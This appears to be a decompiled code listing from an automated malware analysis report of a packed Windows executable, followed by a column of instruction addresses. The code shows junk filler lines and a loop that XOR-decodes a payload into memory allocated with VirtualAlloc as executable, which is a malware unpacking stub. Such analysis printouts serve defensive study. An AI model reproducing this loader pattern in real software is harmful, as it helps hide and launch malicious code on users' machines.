                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x48)) =  *((intOrPtr*)(_t1188 + 0x48)) + _t930;
                        				 *((intOrPtr*)(_t1188 + 0x4f)) =  *((intOrPtr*)(_t1188 + 0x4f)) + _t930;
                        				_t931 = _t930 & 0x48b9e925;
                        				 *(_t931 + 0xc18366) =  *(_t931 + 0xc18366) << 0x66;
                        				do {
                        					_t931 = _t931;
                        					_t1132 = _t1132;
                        					_t1057 = _t1057 - 1;
                        					_t1247 = _t1247;
                        					_t1188 = _t1188;
                        					_t990 = _t990;
                        				} while (_t1057 != 1);
                        				_t1214 = 0x3fffff + _t1057;
                        				_t1151 = _t1132;
                        				_t958 =  *((intOrPtr*)(0xe76e5e));
                        				_t1020 =  *0xe72fb9;
                        				_t1275 = _t1247;
                        				do {
                        					_t1020 = _t1020;
                        					asm("emms");
                        					_t958 = _t958 - 1;
                        					_t1275 = _t1275;
                        					_t1151 = _t1151;
                        					_t1214 = _t1214;
                        				} while ( *_t958 != _t1020);
                        				_t975 = VirtualAlloc(0, 0x10000, 0x1000, 0x40); // executed
                        				_t1172 = 0;
                        				_t1047 =  *((intOrPtr*)(_t958 + 0x10cc));
                        				_t1116 = 0xb810;
                        				_t1177 = _t1172 | 0x004024a5;
                        				_t981 = _t975;
                        				_t1296 = _t1275;
                        				do {
                        					_t1178 = _t1177;
                        					_t1120 = _t1116;
                        					_push(0 ^  *(_t1178 + _t1120));
                        					_t985 = _t981;
                        					_pop( *_t921);
                        					_t1126 = _t1120;
                        					 *(_t985 + _t1126) =  *(_t985 + _t1126) ^ 0xbbec9a97;
                        					_t1177 = _t1178;
                        					_t1296 = _t1296;
                        					_t1047 = _t1047;
                        					_t981 = _t985;
                        					_t1116 = _t1126 - 0xc + 8;
                        				} while (_t1116 >= 0);
                        				_t989 = _t981;
                        				_push(_t989);
                        				return _t989;
                        			}
                        0x00401bbb
                        0x00401bbe
                        0x00401bc1
                        0x00401bc4
                        0x00401bc7
                        0x00401bca
                        0x00401bcd
                        0x00401bd0
                        0x00401bd3
                        0x00401bd6
                        0x00401bd9
                        0x00401bdc
                        0x00401bdf
                        0x00401be2
                        0x00401be5
                        0x00401be8
                        0x00401beb
                        0x00401bee
                        0x00401bf1
                        0x00401bf4
                        0x00401bf7
                        0x00401bfa
                        0x00401bfd
                        0x00401c00
                        0x00401c03
                        0x00401c06
                        0x00401c09
                        0x00401c0c
                        0x00401c0f
                        0x00401c12
                        0x00401c15
                        0x00401c18
                        0x00401c1b
                        0x00401c1e
                        0x00401c21
                        0x00401c24
                        0x00401c27
                        0x00401c2a
                        0x00401c2d
                        0x00401c30
                        0x00401c33
                        0x00401c36
                        0x00401c39
                        0x00401c3c
                        0x00401c3f
                        0x00401c42
                        0x00401c45
                        0x00401c48
                        0x00401c4b
                        0x00401c4e
                        0x00401c51
                        0x00401c54
                        0x00401c57
                        0x00401c5a
                        0x00401c5d
                        0x00401c60
                        0x00401c63
                        0x00401c66
                        0x00401c69
                        0x00401c6c
                        0x00401c6f
                        0x00401c72
                        0x00401c75
                        0x00401c78
                        0x00401c7b
                        0x00401c7e
                        0x00401c81
                        0x00401c84
                        0x00401c87
                        0x00401c8a
                        0x00401c8d
                        0x00401c90
                        0x00401c93
                        0x00401c96
                        0x00401c99
                        0x00401c9c
                        0x00401c9f
                        0x00401ca2
                        0x00401ca5
                        0x00401ca8
                        0x00401cab
                        0x00401cae
                        0x00401cb1
                        0x00401cb4
                        0x00401cb7
                        0x00401cba
                        0x00401cbd
                        0x00401cc0
                        0x00401cc3
                        0x00401cc6
                        0x00401cc9
                        0x00401ccc
                        0x00401ccf
                        0x00401cd2
                        0x00401cd5
                        0x00401cd8
                        0x00401cdb
                        0x00401cde
                        0x00401ce1
                        0x00401ce4
                        0x00401ce7
                        0x00401cea
                        0x00401ced
                        0x00401cf0
                        0x00401cf3
                        0x00401cf6
                        0x00401cf9
                        0x00401cfc
                        0x00401cff
                        0x00401d02
                        0x00401d05
                        0x00401d08
                        0x00401d0b
                        0x00401d0e
                        0x00401d11
                        0x00401d14
                        0x00401d17
                        0x00401d1a
                        0x00401d1d
                        0x00401d20
                        0x00401d23
                        0x00401d26
                        0x00401d29
                        0x00401d2c
                        0x00401d2f
                        0x00401d32
                        0x00401d35
                        0x00401d38
                        0x00401d3b
                        0x00401d3e
                        0x00401d41
                        0x00401d44
                        0x00401d47
                        0x00401d4a
                        0x00401d4d
                        0x00401d50
                        0x00401d53
                        0x00401d56
                        0x00401d59
                        0x00401d5c
                        0x00401d5f
                        0x00401d62
                        0x00401d65
                        0x00401d68
                        0x00401d6b
                        0x00401d6e
                        0x00401d71
                        0x00401d74
                        0x00401d77
                        0x00401d7a
                        0x00401d7d
                        0x00401d80
                        0x00401d83
                        0x00401d86
                        0x00401d89
                        0x00401d8c
                        0x00401d8f
                        0x00401d92
                        0x00401d95
                        0x00401d98
                        0x00401d9b
                        0x00401d9e
                        0x00401da1
                        0x00401da4
                        0x00401da7
                        0x00401daa
                        0x00401dad
                        0x00401db0
                        0x00401db3
                        0x00401db6
                        0x00401db9
                        0x00401dbc
                        0x00401dbf
                        0x00401dc2
                        0x00401dc5
                        0x00401dc8
                        0x00401dcb
                        0x00401dce
                        0x00401dd1
                        0x00401dd4
                        0x00401dd7
                        0x00401dda
                        0x00401ddd
                        0x00401de0
                        0x00401de3
                        0x00401de6
                        0x00401de9
                        0x00401dec
                        0x00401def
                        0x00401df2
                        0x00401df5
                        0x00401df8
                        0x00401dfb
                        0x00401dfe
                        0x00401e01
                        0x00401e04
                        0x00401e07
                        0x00401e0a
                        0x00401e0d
                        0x00401e10
                        0x00401e13
                        0x00401e16
                        0x00401e19
                        0x00401e1c
                        0x00401e1f
                        0x00401e22
                        0x00401e25
                        0x00401e28
                        0x00401e2b
                        0x00401e2e
                        0x00401e31
                        0x00401e34
                        0x00401e37
                        0x00401e3a
                        0x00401e3d
                        0x00401e40
                        0x00401e43
                        0x00401e46
                        0x00401e49
                        0x00401e4c
                        0x00401e4f
                        0x00401e52
                        0x00401e55
                        0x00401e58
                        0x00401e5b
                        0x00401e5e
                        0x00401e61
                        0x00401e64
                        0x00401e67
                        0x00401e6a
                        0x00401e6d
                        0x00401e70
                        0x00401e73
                        0x00401e76
                        0x00401e79
                        0x00401e7c
                        0x00401e7f
                        0x00401e82
                        0x00401e85
                        0x00401e88
                        0x00401e8b
                        0x00401e8e
                        0x00401e91
                        0x00401e94
                        0x00401e97
                        0x00401e9a
                        0x00401e9d
                        0x00401ea0
                        0x00401ea3
                        0x00401ea6
                        0x00401ea9
                        0x00401eac
                        0x00401eaf
